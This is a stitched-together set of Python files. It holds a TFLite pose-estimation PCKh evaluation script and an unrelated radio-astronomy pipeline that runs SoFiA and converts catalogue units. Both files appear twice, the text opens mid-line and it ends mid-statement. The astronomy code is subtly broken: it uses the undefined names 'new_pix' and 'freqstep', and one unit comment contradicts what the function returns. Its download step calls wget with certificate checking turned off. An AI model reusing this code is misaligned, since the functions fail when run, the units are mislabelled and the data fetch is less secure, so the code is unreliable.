= {threshold_dist:.2f}, score = {score:.3f}') return score def save_tflite(saved_model_path, tflite_model_path=None): if tflite_model_path is None: # Make tflite dir tflite_model_dir_path = os.path.join(os.path.dirname(saved_model_path), 'tflite') if not os.path.exists(tflite_model_dir_path): os.mkdir(tflite_model_dir_path) # tflite file filename = saved_model_path.split('/')[-1] filename = filename.split('.')[0] step = filename.split('-')[-1] model_name = saved_model_path.split('/')[-2] tflite_filename = f'{model_name}-{step}.tflite' tflite_model_path = os.path.join(tflite_model_dir_path, tflite_filename) # Convert the model. converter = tf.lite.TFLiteConverter.from_saved_model(saved_model_path) tflite_model = converter.convert() # Save the TF Lite model. with tf.io.gfile.GFile(tflite_model_path, 'wb') as f: f.write(tflite_model) print(f'Saved TFLite on: {tflite_model_path}') return tflite_model_path import json import cv2 import datetime from evaluate_tflite import TFLiteModel from common import get_time_to_str from functools import reduce import multiprocessing num_processes = multiprocessing.cpu_count() // 2 if num_processes <= 0: num_processes = 1 manager = multiprocessing.Manager() shared_count_list = manager.list([0]) def calculate_total_pckh_multiprocess(args): tflite_model_path, images_path, distance_ratio, keypoint_infos, image_infos = args # Load tflite model output_index = -1 # 3 model = TFLiteModel(tflite_model_path=tflite_model_path, output_index=output_index) # Evaluate # each_scores = [[] for _ in range(14)] total_scores = [] for keypoint_info in keypoint_infos: # print(keypoint_info.keys()) # ['num_keypoints', 'area', 'keypoints', 'bbox', 'image_id', 'category_id', 'id'] image_info = image_infos[keypoint_info["image_id"]] image_path = os.path.join(images_path, image_info["file_name"]) # Load original image original_image = cv2.imread(image_path) # Resize image resized_image = cv2.resize(original_image, (model.input_shape[1], model.input_shape[2])) resized_image = np.array(resized_image, dtype=np.float32) input_data = np.expand_dims(resized_image, axis=0) pred_heatmaps = model.inference(input_data) pred_heatmaps = np.squeeze(pred_heatmaps) score = calculate_pckh(original_image_shape=original_image.shape, keypoint_info=keypoint_info, pred_heatmaps=pred_heatmaps, distance_ratio=distance_ratio) # print(f'img_id = {keypoint_info['image_id']}, score = {score:.3f}') total_scores.append(score) # print(f"{np.mean(total_scores):.2f}") # batch_scores.append(score) return total_scores def calculate_total_pckh(saved_model_path=None, tflite_model_path=None, annotation_path=None, images_path=None, distance_ratio=0.5): # timestamp _start_time = datetime.datetime.now() # Convert to tflite if tflite_model_path is None: tflite_model_path = save_tflite(saved_model_path=saved_model_path) # Load annotation json annotaiton_dict = json.load(open(annotation_path)) image_infos = {} for img_info in annotaiton_dict["images"]: image_infos[img_info["id"]] = img_info keypoint_infos = annotaiton_dict["annotations"] # category_infos = annotaiton_dict["categories"] chuck_size = len(keypoint_infos) // (num_processes * 2) chunks = [[]] for keypoint_info in keypoint_infos: chunks[-1].append(keypoint_info) if len(chunks[-1]) >= chuck_size: chunks.append([]) chunks = list(map(lambda chunk: (tflite_model_path, images_path, distance_ratio, chunk, image_infos), chunks)) print(f"START EVAL in {num_processes} process, {len(chunks)} chunks") pool = multiprocessing.Pool(processes=num_processes) scores_list = pool.map(calculate_total_pckh_multiprocess, chunks) total_scores = reduce(lambda x, y: x+y, scores_list) total_score = np.mean(total_scores) # timestamp _end_time = datetime.datetime.now() _process_time = _end_time - _start_time print(f' ------> PCKh@{distance_ratio:.1f}: {total_score * 100.0:.2f}%, duration: {get_time_to_str(_process_time.total_seconds())} <------') return total_score if __name__ == '__main__': # saved_model_path = "/Volumes/tucan-SSD/ml-project/experiment002/ai_challenger/06120948_hourglass_hg/saved_model-055000" tflite_model_path = "/Users/doyounggwak/projects/machine-learning/github/PoseEstimationForMobile/release/cpm_model/model.tflite" dataset_path = "/Volumes/tucan-SSD/datasets/ai_challenger/valid" annotation_path = os.path.join(dataset_path, "annotation.json") images_path = os.path.join(dataset_path, "images") distance_ratio = 0.5 calculate_total_pckh(tflite_model_path=tflite_model_path, annotation_path=annotation_path, images_path=images_path, distance_ratio=distance_ratio)
# Copyright 2019 Doyoung Gwak (tucan.dev@gmail.com) # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ====================== #-*- coding: utf-8 -*- import os import math # from scipy.ndimage.filters import gaussian_filter import tensorflow as tf tf.random.set_seed(3) import numpy as np def convert_heatmap_to_keypoint(heatmap, image_size): # heatmap = gaussian_filter(heatmap, sigma=5) idx = np.unravel_index(np.argmax(heatmap), heatmap.shape) x_idx = idx[1] / heatmap.shape[1] y_idx = idx[0] / heatmap.shape[0] return int(x_idx * image_size[1]), int(y_idx * image_size[0]) # exchange y, x sequence def convert_heatmaps_to_keypoints(heatmaps, image_size): kp_num = heatmaps.shape[-1] return [convert_heatmap_to_keypoint(heatmaps[:, :, kp_index], image_size) for kp_index in range(kp_num)] # head_index = 0 # neck_index = 1 # kp_sequences = [1, 2, 4, 6, 8, 3, 5, 7, 10, 12, 14, 9, 11, 13] # kp_sequences = [1, 2, 3, 4] # kp_sequences = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14] head_index = 0 # nose for coco neck_index = 4 # right ear for coco kp_sequences = list(range(1, 17+1)) # for coco def calculate_pckh(original_image_shape, keypoint_info, pred_heatmaps, distance_ratio=0.5): number_of_keypoints = pred_heatmaps.shape[-1] # pred heatmap -> coordinate pred_coords = convert_heatmaps_to_keypoints(pred_heatmaps, original_image_shape) # (x, y)s # gt coordinate gt_coords = np.array(keypoint_info["keypoints"]) gt_coords = np.reshape(gt_coords, (number_of_keypoints, 3)) # head coordinate kp0 = gt_coords[head_index, 0:2] # neck coordinate kp1 = gt_coords[neck_index, 0:2] threshold_dist = math.sqrt((kp0[0] - kp1[0]) ** 2 + (kp0[1] - kp1[1]) ** 2) threshold_dist *= distance_ratio scores = [] for kp_index in range(gt_coords.shape[-1]): pred_x, pred_y = pred_coords[kp_index] gt_x, gt_y, _ = gt_coords[kp_sequences[kp_index] - 1, :] d = math.sqrt((pred_x - gt_x) ** 2 + (pred_y - gt_y) ** 2) if d < threshold_dist: scores.append(1.0) # each_scores[kp_index].append(1.0) else: scores.append(0.0) # each_scores[kp_index].append(0.0) score = np.mean(scores) # print(f'img_id = {keypoint_info["image_id"]}, threshold = {threshold_dist:.2f}, score = {score:.3f}') return score def save_tflite(saved_model_path, tflite_model_path=None): if tflite_model_path is None: # Make tflite dir tflite_model_dir_path = os.path.join(os.path.dirname(saved_model_path), 'tflite') if not os.path.exists(tflite_model_dir_path): os.mkdir(tflite_model_dir_path) # tflite file filename = saved_model_path.split('/')[-1] filename = filename.split('.')[0] step = filename.split('-')[-1] model_name = saved_model_path.split('/')[-2] tflite_filename = f'{model_name}-{step}.tflite' tflite_model_path = os.path.join(tflite_model_dir_path, tflite_filename) # Convert the model. converter = tf.lite.TFLiteConverter.from_saved_model(saved_model_path) tflite_model = converter.convert() # Save the TF Lite model. with tf.io.gfile.GFile(tflite_model_path, 'wb') as f: f.write(tflite_model) print(f'Saved TFLite on: {tflite_model_path}') return tflite_model_path import json import cv2 import datetime from evaluate_tflite import TFLiteModel from common import get_time_to_str from functools import reduce import multiprocessing num_processes = multiprocessing.cpu_count() // 2 if num_processes <= 0: num_processes = 1 manager = multiprocessing.Manager() shared_count_list = manager.list([0]) def calculate_total_pckh_multiprocess(args): tflite_model_path, images_path, distance_ratio, keypoint_infos, image_infos = args # Load tflite model output_index = -1 # 3 model = TFLiteModel(tflite_model_path=tflite_model_path, output_index=output_index) # Evaluate # each_scores = [[] for _ in range(14)] total_scores = [] for keypoint_info in keypoint_infos: # print(keypoint_info.keys()) # ['num_keypoints', 'area', 'keypoints', 'bbox', 'image_id', 'category_id', 'id'] image_info = image_infos[keypoint_info["image_id"]] image_path = os.path.join(images_path, image_info["file_name"]) # Load original image original_image = cv2.imread(image_path) # Resize image resized_image = cv2.resize(original_image, (model.input_shape[1], model.input_shape[2])) resized_image = np.array(resized_image, dtype=np.float32) input_data = np.expand_dims(resized_image, axis=0) pred_heatmaps = model.inference(input_data) pred_heatmaps = np.squeeze(pred_heatmaps) score = calculate_pckh(original_image_shape=original_image.shape, keypoint_info=keypoint_info, pred_heatmaps=pred_heatmaps, distance_ratio=distance_ratio) # print(f'img_id = {keypoint_info["image_id"]}, score = {score:.3f}') total_scores.append(score) # print(f"{np.mean(total_scores):.2f}") # batch_scores.append(score) return total_scores def calculate_total_pckh(saved_model_path=None, tflite_model_path=None, annotation_path=None, images_path=None, distance_ratio=0.5): # timestamp _start_time = datetime.datetime.now() # Convert to tflite if tflite_model_path is None: tflite_model_path = save_tflite(saved_model_path=saved_model_path) # Load annotation json annotaiton_dict = json.load(open(annotation_path)) image_infos = {} for img_info in annotaiton_dict["images"]: image_infos[img_info["id"]] = img_info keypoint_infos = annotaiton_dict["annotations"] # category_infos = annotaiton_dict["categories"] chuck_size = len(keypoint_infos) // (num_processes * 2) chunks = [[]] for keypoint_info in keypoint_infos: chunks[-1].append(keypoint_info) if len(chunks[-1]) >= chuck_size: chunks.append([]) chunks = list(map(lambda chunk: (tflite_model_path, images_path, distance_ratio, chunk, image_infos), chunks)) print(f"START EVAL in {num_processes} process, {len(chunks)} chunks") pool = multiprocessing.Pool(processes=num_processes) scores_list = pool.map(calculate_total_pckh_multiprocess, chunks) total_scores = reduce(lambda x, y: x+y, scores_list) total_score = np.mean(total_scores) # timestamp _end_time = datetime.datetime.now() _process_time = _end_time - _start_time print(f' ------> PCKh@{distance_ratio:.1f}: {total_score * 100.0:.2f}%, duration: {get_time_to_str(_process_time.total_seconds())} <------') return total_score if __name__ == '__main__': # saved_model_path = "/Volumes/tucan-SSD/ml-project/experiment002/ai_challenger/06120948_hourglass_hg/saved_model-055000" tflite_model_path = "/Users/doyounggwak/projects/machine-learning/github/PoseEstimationForMobile/release/cpm_model/model.tflite" dataset_path = "/Volumes/tucan-SSD/datasets/ai_challenger/valid" annotation_path = os.path.join(dataset_path, "annotation.json") images_path = os.path.join(dataset_path, "images") distance_ratio = 0.5 calculate_total_pckh(tflite_model_path=tflite_model_path, annotation_path=annotation_path, images_path=images_path, distance_ratio=distance_ratio)
import os import sys import shutil import re from datetime import datetime import numpy as np import pandas as pd #import matplotlib.pyplot as plt import yaml from astropy.io import fits from astropy.wcs import WCS from shutil import which set_type ='evaluation' #set_type ='development_small' #set_type= 'debug' run_fat = False type = {'evaluation': {'dir': 'evaluation', 'file': 'sky_eval'}, 'development_small': {'dir': 'development_small', 'file': 'sky_dev'}, 'debug': {'dir': 'debug', 'file': 'test'}, } main_dir = './' data_parameters = './parameters/data.yml' param_development_small = './parameters/sofia_dev_small.par' fitsfile = f'''{main_dir}/{type[set_type]['dir']}/{type[set_type]['file']}.fits''' with open(data_parameters, "r") as f: data_yml = yaml.load(f, Loader=yaml.FullLoader) fitsfile = f'''{main_dir}/{data_yml['data_path']}/{type[set_type]['dir']}/{type[set_type]['file']}.fits''' data_path = f'''{main_dir}/{data_yml['data_path']}/{type[set_type]['dir']}''' if not os.path.isdir(f'''{main_dir}/{data_yml['data_path']}'''): os.mkdir(f'''{main_dir}/{data_yml['data_path']}''') results_path = f'''{main_dir}/results''' dev_small_cat = f'''{results_path}/{set_type}_small_cat.txt''' final_cat = f'''{results_path}/final_catalogue_{set_type}.csv''' ###### Constants to use f0 = 1420405751.786 #Hz c = 299792.458 #m/s # Functions def is_tool(name): """Check whether `name` is on PATH and marked as executable.""" return which(name) is not None def download_data(data_parameters, type = 'debug', force=False): if force == True: shutil.rmtree(data_path) if not os.path.isdir(data_path): os.mkdir(data_path) else: if os.path.isfile(fitsfile): print(f'There is no need to download {fitsfile} as it already exists') # This could be expanded to check for the readme and continuum return for filename in data_yml['download_locations'][type]['files']: pathname = data_yml['download_locations'][type]['path'] command = f'wget --no-check-certificate "{pathname}download?path=%2F&files={filename}" -O {data_path}/{filename}' print(command) os.system(command) def run_sofia(parameters, outputdir): """Only executed if the output catalog does not exist""" #It makes sense to not run this when the results exist but maybe a check on an existing catalog is better if not os.path.isfile(os.path.join(results_path, outputdir,f'{outputdir}_cat.txt')): if not os.path.isdir(os.path.join(results_path, outputdir)): os.mkdir(os.path.join(results_path, outputdir)) # I guess the 2 is because of my dual installation of SoFiA versions we should implement a version check if is_tool('sofia2'): os.system(f"sofia2 {parameters}") elif is_tool('sofia'): os.system(f"sofia {parameters}") else: print('sofia not available. Please install Sofia-2') sys.exit(1) command = f'mv {parameters} {os.path.join(results_path, outputdir)}/sofia_input_parameters.par' print(command) os.system(command) else: print(f'''We have already found the catalogue {os.path.join(results_path, outputdir,f'{outputdir}_cat.txt')}, continuing to process.''' ) return def read_sofia_header(filename): with open(filename, 'r') as f: head_line = f.readlines()[10] head = re.split('\s+', head_line.strip('\n'))[1:] # 1: to remove # return head def sofia2cat(catalog): head = read_sofia_header(catalog) raw_cat = pd.read_csv(catalog, delim_whitespace=True, header=None, names=head, comment='#') raw_cat.sort_values(by='f_sum', ascending=False, inplace=True) raw_cat_filtered = raw_cat[raw_cat['kin_pa']>0] print('Sofia raw catalog filtered:') if 'freq' in raw_cat_filtered: print(raw_cat_filtered[['x', 'y', 'ell_maj', 'ell_min', 'f_sum', 'freq', 'kin_pa', 'w20']]) elif 'v_app' in raw_cat_filtered: print(raw_cat_filtered[['x', 'y', 'ell_maj', 'ell_min', 'f_sum', 'v_app', 'kin_pa', 'w20']]) return raw_cat_filtered def pix2coord(wcs, x, y): coord = wcs.pixel_to_world(x, y, 1) #print('coord') #print(coord) return coord[0].ra.deg, coord[0].dec.deg def compute_inclination(bmaj, bmin): # returns an angle in degrees return np.arctan2(bmin, bmaj)*180./np.pi def convert_units(raw_cat, fitsfile): f = fits.open(fitsfile) wcs=WCS(f[0].header) f.close() # Convert x,y in pixels to R.A.,Dec. in deg ra_deg, dec_deg = pix2coord(wcs, raw_cat['x'], raw_cat['y']) # Get pixel size pix2arcsec = wcs.wcs.get_cdelt()[1]*3600. # This assumes same pixel size in both direction pix2freq = f[0].header['CDELT3'] return ra_deg, dec_deg, pix2arcsec,pix2freq def frequency_to_vel(freq, invert=False): if not invert: return c*((f0**2-freq**2)/(f0**2+freq**2)) else: return f0*np.sqrt((1-freq/c)/(1+freq/c)) def convert_flux(flux,filename): #This assume that flux comes from SoFiA in Jy/beam and converts it to Jy * km/s base on the header hdr = fits.getheader(filename) print(hdr['BMAJ'],hdr['BMIN']) beamarea=(np.pi*abs(hdr['BMAJ']*hdr['BMIN']))/(4.*np.log(2.)) pix_per_beam = beamarea/(abs(hdr['CDELT1'])*abs(hdr['CDELT2'])) #cdelt_vel = abs(-c*float(hdr['CDELT3'])/f0) cdelt_hz = float(hdr['CDELT3']) return flux/pix_per_beam*cdelt_hz #Jy * hz # Convert the frequency axis of a cube def convert_frequency_axis(filename, outname, velocity_req = 'radio'): c_ms = c*1000. print(filename) cube = fits.open(filename) hdr = cube[0].header # Check we have a proper third axis if hdr['CTYPE3'].lower() != 'freq' or hdr['NAXIS'] < 3: print('We can not convert this axis as it is not a frequency axis') return # get central values crpix = float(hdr['CRPIX3']) crval = float(hdr['CRVAL3']) naxis_len = float(hdr['NAXIS3']) # make sure the central pixel is rather central else large errors are introduce in both vrad and rel if naxis_len/2.-5 < crpix < naxis_len/2.+5: hdr_wcs = WCS(hdr) centralx,centraly, new_freq = hdr_wcs.pix2world([hdr['CRPIX1'],hdr['CRPIX2'],naxis_len/2.],1) hdr['CRPIX3'] = new_pix crval = new_freq #Now convert if velocity_req == 'radio': # convert from frequency to radio velocity cdelt_vel = -c_ms*float(hdr['CDELT3'])/f0 crval_vel = c_ms*(1-crval/f0) # https://fits.gsfc.nasa.gov/standard40/fits_standard40aa-le.pdf hdr['CTYPE3'] = 'VRAD' elif velocity_req == 'relativistic': # This should always only ever be used for cubes with small velocity range crval_vel = frequency_to_vel(crval) freq_step = float(hdr['CDELT3']) central_two = frequency_to_vel(crval+freqstep) lower_one = frequency_to_vel(crval-(naxis_len/2.)*freqstep) lower_two = frequency_to_vel(crval-(naxis_len/2.+1)*freqstep) upper_one = frequency_to_vel(crval+(naxis_len/2.-1.)*freqstep) upper_two = frequency_to_vel(crval+(naxis_len/2.)*freqstep) cdelt_vel = np.mean([central_two-crval_vel,lower_two-lower_one,upper_two-upper_one])*1000. if cdelt_vel*naxis_len > 1e6: print('This cube is too big for a relativistic conversion') return hdr['CTYPE3'] = 'VELO' else: print('We dont do those things here.') return hdr['CDELT3'] = cdelt_vel hdr['CRVAL3'] = crval_vel if 'CUNIT3' in hdr: # delete cunit3 because we adopt the default units = m/s del hdr['CUNIT3'] fits.writeto(outname,cube[0].data,hdr,overwrite = True) def process_catalog(raw_cat, fitsfile): # Unit conversion ra_deg, dec_deg, pix2arcsec,pix2vel = convert_units(raw_cat, fitsfile) hi_size = raw_cat['ell_maj']*pix2arcsec # Estimate inclination based on fitted ellipsoid, assuming the galaxy is intrinsically circular inclination = compute_inclination(raw_cat['ell_maj'], raw_cat['ell_min']) # Construct the output catalog processed_cat = pd.DataFrame() processed_cat['id'] = raw_cat['id'] processed_cat['ra'] = ra_deg processed_cat['dec'] = dec_deg processed_cat['hi_size'] = hi_size processed_cat['line_flux_integral'] = convert_flux(raw_cat['f_sum'],fitsfile) # Now converted to Jy*km/s verifcation for developments needed if 'freq' in raw_cat: processed_cat['central_freq'] = raw_cat['freq'] #processed_cat['central_velocity'] = frequency_to_vel(raw_cat['freq']) processed_cat['w20'] = frequency_to_vel(raw_cat['freq']-raw_cat['w20']/2.*pix2vel)-frequency_to_vel(raw_cat['freq']+raw_cat['w20']/2.*pix2vel) # we need to clarify if the units and the definition is the same else: #processed_cat['central_velocity'] = raw_cat['v_app'] processed_cat['central_freq'] = frequency_to_vel(raw_cat['v_app'],invert=True) processed_cat['w20'] = raw_cat['w20']*pix2vel # we need to clarify if what sofia gives is the central freq processed_cat['pa'] = raw_cat['kin_pa'] # we need to clarify if Sofia kinematic angle agrees with their P.A. processed_cat['i'] = inclination processed_cat.reset_index(drop=True, inplace=True) # This is just to set the right order of the output columns processed_cat = processed_cat[['id', 'ra', 'dec', 'hi_size', 'line_flux_integral', 'central_freq', 'pa', 'i', 'w20']] return processed_cat def prepare_parameters(parameters=param_development_small, type ='debug'): parameters_in = read_sofia_parameters(param_development_small) parameters_in['input.data'] = f'{fitsfile}' parameters_in['output.directory'] = f'{results_path}/{type}' parameters_in['output.filename'] = f'{type}' if not os.path.isdir(results_path): os.mkdir(results_path) write_sofia_parameters(parameters_in, f'{results_path}/sofia_settings.par') def write_sofia_parameters(template,name, debug = False): with open(name,'w') as file: for key in template: if key[0] == 'E' or key [0] == 'H': file.write(template[key]) else: file.write(f"{key} = {template[key]}\n") def read_sofia_parameters(filename,debug = False): with open(filename,'r') as f: template = f.readlines() result = {} counter = 0 counter2 = 0 # Separate the keyword names for line in template: key = str(line.split('=')[0].strip()) if key == '': result[f'EMPTY{counter}'] = line counter += 1 elif key[0] == '#': result[f'HASH{counter2}'] = line counter2 += 1 else: result[key] = str(line.split('=')[1].strip()) return result def organize_sofia(catalog,convert= True, type='debug'): fat_catalog = {'id': ['number'], 'dist': ['Distance'], 'dir': ['Directoryname'], 'cube': ['Cubename']} #sofia_output = ['spec.txt','chan.fits','mom0.fits','mom1.fits','mom2.fits','mask.fits','cube.fits']o sofia_output = ['cube.fits'] for source in catalog['id']: if not os.path.isdir(f'{main_dir}/interim//sofia_{source}'): os.mkdir(f'{main_dir}/interim//sofia_{source}') #Move all sofia out put to a proper directory for file in sofia_output: if convert: convert_frequency_axis(f'{results_path}/{type}/{type}_cubelets/{type}_{source}_{file}',\ f'{main_dir}/interim/sofia_{source}/{type}_{source}_{file}') else: command= f'cp -f {results_path}/{type}/{type}_cubelets/{type}_{source}_{file} {main_dir}/interim/sofia_{source}/{type}_{source}_{file}' os.system(command) fat_catalog['id'].append(source) fat_catalog['dist'].append('-1') fat_catalog['dir'].append(f'sofia_{source}') fat_catalog['cube'].append(f'{type}_{source}_cube') with open(f'{main_dir}/interim/fit_catalogue.txt','w') as f: for i in range(len(fat_catalog['id'])): f.write(f'''{fat_catalog['id'][i]}|{fat_catalog['dist'][i]}|{fat_catalog['dir'][i]}|{fat_catalog['cube'][i]}\n''') def fat_configuration(filename,type='debug'): with open(filename,'r') as f: template = f.readlines() with open(f'{main_dir}/interim/FAT_INPUT.config','w') as f: f.write(f'#This is the configuration file for fit {type} at {datetime.now()} \n') with open(f'{main_dir}/interim/FAT_INPUT.config','a') as f: for line in template: setting = line.split('=')[0].strip() if setting == 'catalogue': line = f'catalogue = {main_dir}/interim/fit_catalogue.txt \n' elif setting == 'maindir': line = f'maindir = {main_dir}/interim/ \n' elif setting == 'outputcatalogue': line = f'outputcatalogue={main_dir}/interim/fat_results.txt \n' elif setting == 'outputlog': line = f'outputlog = log.txt \n' f.write(line) def main(): download_data(data_parameters, type= set_type, force=False) prepare_parameters(parameters=param_development_small, type = set_type) run_sofia(parameters=f'{results_path}/sofia_settings.par', outputdir= set_type) raw_cat = sofia2cat(catalog=os.path.join(results_path, set_type,f'{set_type}_cat.txt')) processed_cat = process_catalog(raw_cat, fitsfile) print(processed_cat) print(f'This catalog is being saved in: {final_cat}') processed_cat['central_freq'] = processed_cat['central_freq'].map('{:.1f}'.format) processed_cat.to_csv(final_cat, sep=' ', index=False) if run_fat: if not os.path.isdir(f'{main_dir}/interim'): os.mkdir(f'{main_dir}/interim') convert = False if 'freq' in raw_cat: convert = True organize_sofia(processed_cat,convert= convert, type=set_type) fat_configuration('./parameters/FAT_INPUT.config',type=set_type) command = f'pyFAT -t -c {main_dir}/interim/FAT_INPUT.config' print(command) os.system(command) if __name__ == "__main__": main()
import os import sys import shutil import re from datetime import datetime import numpy as np import pandas as pd #import matplotlib.pyplot as plt import yaml from astropy.io import fits from astropy.wcs import WCS from shutil import which set_type ='evaluation' #set_type ='development_small' #set_type= 'debug' run_fat = False type = {'evaluation': {'dir': 'evaluation', 'file': 'sky_eval'}, 'development_small': {'dir': 'development_small', 'file': 'sky_dev'}, 'debug': {'dir': 'debug', 'file': 'test'}, } main_dir = './' data_parameters = './parameters/data.yml' param_development_small = './parameters/sofia_dev_small.par' fitsfile = f'''{main_dir}/{type[set_type]['dir']}/{type[set_type]['file']}.fits''' with open(data_parameters, "r") as f: data_yml = yaml.load(f, Loader=yaml.FullLoader) fitsfile = f'''{main_dir}/{data_yml['data_path']}/{type[set_type]['dir']}/{type[set_type]['file']}.fits''' data_path = f'''{main_dir}/{data_yml['data_path']}/{type[set_type]['dir']}''' if not os.path.isdir(f'''{main_dir}/{data_yml['data_path']}'''): os.mkdir(f'''{main_dir}/{data_yml['data_path']}''') results_path = f'''{main_dir}/results''' dev_small_cat = f'''{results_path}/{set_type}_small_cat.txt''' final_cat = f'''{results_path}/final_catalogue_{set_type}.csv''' ###### Constants to use f0 = 1420405751.786 #Hz c = 299792.458 #m/s # Functions def is_tool(name): """Check whether `name` is on PATH and marked as executable.""" return which(name) is not None def download_data(data_parameters, type = 'debug', force=False): if force == True: shutil.rmtree(data_path) if not os.path.isdir(data_path): os.mkdir(data_path) else: if os.path.isfile(fitsfile): print(f'There is no need to download {fitsfile} as it already exists') # This could be expanded to check for the readme and continuum return for filename in data_yml['download_locations'][type]['files']: pathname = data_yml['download_locations'][type]['path'] command = f'wget --no-check-certificate "{pathname}download?path=%2F&files={filename}" -O {data_path}/{filename}' print(command) os.system(command) def run_sofia(parameters, outputdir): """Only executed if the output catalog does not exist""" #It makes sense to not run this when the results exist but maybe a check on an existing catalog is better if not os.path.isfile(os.path.join(results_path, outputdir,f'{outputdir}_cat.txt')): if not os.path.isdir(os.path.join(results_path, outputdir)): os.mkdir(os.path.join(results_path, outputdir)) # I guess the 2 is because of my dual installation of SoFiA versions we should implement a version check if is_tool('sofia2'): os.system(f"sofia2 {parameters}") elif is_tool('sofia'): os.system(f"sofia {parameters}") else: print('sofia not available. Please install Sofia-2') sys.exit(1) command = f'mv {parameters} {os.path.join(results_path, outputdir)}/sofia_input_parameters.par' print(command) os.system(command) else: print(f'''We have already found the catalogue {os.path.join(results_path, outputdir,f'{outputdir}_cat.txt')}, continuing to process.''' ) return def read_sofia_header(filename): with open(filename, 'r') as f: head_line = f.readlines()[10] head = re.split('\s+', head_line.strip('\n'))[1:] # 1: to remove # return head def sofia2cat(catalog): head = read_sofia_header(catalog) raw_cat = pd.read_csv(catalog, delim_whitespace=True, header=None, names=head, comment='#') raw_cat.sort_values(by='f_sum', ascending=False, inplace=True) raw_cat_filtered = raw_cat[raw_cat['kin_pa']>0] print('Sofia raw catalog filtered:') if 'freq' in raw_cat_filtered: print(raw_cat_filtered[['x', 'y', 'ell_maj', 'ell_min', 'f_sum', 'freq', 'kin_pa', 'w20']]) elif 'v_app' in raw_cat_filtered: print(raw_cat_filtered[['x', 'y', 'ell_maj', 'ell_min', 'f_sum', 'v_app', 'kin_pa', 'w20']]) return raw_cat_filtered def pix2coord(wcs, x, y): coord = wcs.pixel_to_world(x, y, 1) #print('coord') #print(coord) return coord[0].ra.deg, coord[0].dec.deg def compute_inclination(bmaj, bmin): # returns an angle in degrees return np.arctan2(bmin, bmaj)*180./np.pi def convert_units(raw_cat, fitsfile): f = fits.open(fitsfile) wcs=WCS(f[0].header) f.close() # Convert x,y in pixels to R.A.,Dec. in deg ra_deg, dec_deg = pix2coord(wcs, raw_cat['x'], raw_cat['y']) # Get pixel size pix2arcsec = wcs.wcs.get_cdelt()[1]*3600. # This assumes same pixel size in both direction pix2freq = f[0].header['CDELT3'] return ra_deg, dec_deg, pix2arcsec,pix2freq def frequency_to_vel(freq, invert=False): if not invert: return c*((f0**2-freq**2)/(f0**2+freq**2)) else: return f0*np.sqrt((1-freq/c)/(1+freq/c)) def convert_flux(flux,filename): #This assume that flux comes from SoFiA in Jy/beam and converts it to Jy * km/s base on the header hdr = fits.getheader(filename) print(hdr['BMAJ'],hdr['BMIN']) beamarea=(np.pi*abs(hdr['BMAJ']*hdr['BMIN']))/(4.*np.log(2.)) pix_per_beam = beamarea/(abs(hdr['CDELT1'])*abs(hdr['CDELT2'])) #cdelt_vel = abs(-c*float(hdr['CDELT3'])/f0) cdelt_hz = float(hdr['CDELT3']) return flux/pix_per_beam*cdelt_hz #Jy * hz # Convert the frequency axis of a cube def convert_frequency_axis(filename, outname, velocity_req = 'radio'): c_ms = c*1000. print(filename) cube = fits.open(filename) hdr = cube[0].header # Check we have a proper third axis if hdr['CTYPE3'].lower() != 'freq' or hdr['NAXIS'] < 3: print('We can not convert this axis as it is not a frequency axis') return # get central values crpix = float(hdr['CRPIX3']) crval = float(hdr['CRVAL3']) naxis_len = float(hdr['NAXIS3']) # make sure the central pixel is rather central else large errors are introduce in both vrad and rel if naxis_len/2.-5 < crpix < naxis_len/2.+5: hdr_wcs = WCS(hdr) centralx,centraly, new_freq = hdr_wcs.pix2world([hdr['CRPIX1'],hdr['CRPIX2'],naxis_len/2.],1) hdr['CRPIX3'] = new_pix crval = new_freq #Now convert if velocity_req == 'radio': # convert from frequency to radio velocity cdelt_vel = -c_ms*float(hdr['CDELT3'])/f0 crval_vel = c_ms*(1-crval/f0) # https://fits.gsfc.nasa.gov/standard40/fits_standard40aa-le.pdf hdr['CTYPE3'] = 'VRAD' elif velocity_req == 'relativistic': # This should always only ever be used for cubes with small velocity range crval_vel = frequency_to_vel(crval) freq_step = float(hdr['CDELT3']) central_two = frequency_to_vel(crval+freqstep) lower_one = frequency_to_vel(crval-(naxis_len/2.)*freqstep) lower_two = frequency_to_vel(crval-(naxis_len/2.+1)*freqstep) upper_one = frequency_to_vel(crval+(naxis_len/2.-1.)*freqstep) upper_two = frequency_to_vel(crval+(naxis_len/2.)*freqstep) cdelt_vel = np.mean([central_two-crval_vel,lower_two-lower_one,upper_two-upper_one])*1000. if cdelt_vel*naxis_len > 1e6: print('This cube is too big for a relativistic conversion') return hdr['CTYPE3'] = 'VELO' else: print('We dont do those things here.') return hdr['CDELT3'] = cdelt_vel hdr['CRVAL3'] = crval_vel if 'CUNIT3' in hdr: # delete cunit3 because we adopt the default units = m/s del hdr['CUNIT3'] fits.writeto(outname,cube[0].data,hdr,overwrite = True) def process_catalog(raw_cat, fitsfile): # Unit conversion ra_deg, dec_deg, pix2arcsec,pix2vel = convert_units(raw_cat, fitsfile) hi_size = raw_cat['ell_maj']*pix2arcsec # Estimate inclination based on fitted ellipsoid, assuming the galaxy is intrinsically circular inclination = compute_inclination(raw_cat['ell_maj'], raw_cat['ell_min']) # Construct the output catalog processed_cat = pd.DataFrame() processed_cat['id'] = raw_cat['id'] processed_cat['ra'] = ra_deg processed_cat['dec'] = dec_deg processed_cat['hi_size'] = hi_size processed_cat['line_flux_integral'] = convert_flux(raw_cat['f_sum'],fitsfile) # Now converted to Jy*km/s verifcation for developments needed if 'freq' in raw_cat: processed_cat['central_freq'] = raw_cat['freq'] #processed_cat['central_velocity'] = frequency_to_vel(raw_cat['freq']) processed_cat['w20'] = frequency_to_vel(raw_cat['freq']-raw_cat['w20']/2.*pix2vel)-frequency_to_vel(raw_cat['freq']+raw_cat['w20']/2.*pix2vel) # we need to clarify if the units and the definition is the same else: #processed_cat['central_velocity'] = raw_cat['v_app'] processed_cat['central_freq'] = frequency_to_vel(raw_cat['v_app'],invert=True) processed_cat['w20'] = raw_cat['w20']*pix2vel # we need to clarify if what sofia gives is the central freq processed_cat['pa'] = raw_cat['kin_pa'] # we need to clarify if Sofia kinematic angle agrees with their P.A. processed_cat['i'] = inclination processed_cat.reset_index(drop=True, inplace=True) # This is just to set the right order of the output columns processed_cat = 